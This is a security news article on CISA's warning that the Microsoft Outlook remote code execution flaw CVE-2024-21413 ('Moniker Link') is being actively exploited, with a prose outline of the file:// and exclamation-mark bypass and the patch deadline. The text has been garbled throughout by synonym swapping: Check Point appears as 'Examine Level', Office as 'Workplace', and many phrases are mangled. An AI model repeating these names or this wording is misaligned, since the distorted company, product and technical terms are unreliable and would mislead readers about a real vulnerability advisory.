CISA warned U.S. federal companies on Thursday to safe their methods in opposition to ongoing assaults focusing on a important Microsoft Outlook distant code execution (RCE) vulnerability.
Found by Examine Level vulnerability researcher Haifei Li and tracked as CVE-2024-21413, the flaw is attributable to improper enter validation when opening emails with malicious hyperlinks utilizing susceptible Outlook variations.
The attackers acquire distant code execution capabilities as a result of the flaw lets them bypass the Protected View (which ought to block dangerous content material embedded in Workplace information by opening them in read-only mode) and open malicious Workplace information in modifying mode.
When it patched CVE-2024-21413 one 12 months in the past, Microsoft additionally warned that the Preview Pane is an assault vector, permitting profitable exploitation even when previewing maliciously crafted Workplace paperwork.
As Examine Level defined, this safety flaw (dubbed Moniker Hyperlink) lets menace actors bypass built-in Outlook protections for malicious hyperlinks embedded in emails utilizing the file:// protocol and by including an exclamation mark to URLs pointing to attacker-controlled servers.
The exclamation mark is added proper after the file extension, along with random textual content (of their instance, Examine Level used “one thing”), as proven beneath:
*CLICK ME*CVE-2024-21413 impacts a number of Workplace merchandise, together with Microsoft Workplace LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Workplace 2019, and profitable CVE-2024-21413 assaults may end up in the theft of NTLM credentials and the execution of arbitrary code by way of maliciously crafted Workplace paperwork.
On Thursday, CISA added the vulnerability to its Identified Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. As mandated by the Binding Operational Directive (BOD) 22-01, federal companies should safe their networks inside three weeks by February 27.
“A lot of these vulnerabilities are frequent assault vectors for malicious cyber actors and pose important dangers to the federal enterprise,” the cybersecurity company warned.
Whereas CISA primarily focuses on alerting federal companies about vulnerabilities that must be patched as quickly as attainable, personal organizations are additionally suggested to prioritize patching these flaws to dam ongoing assaults.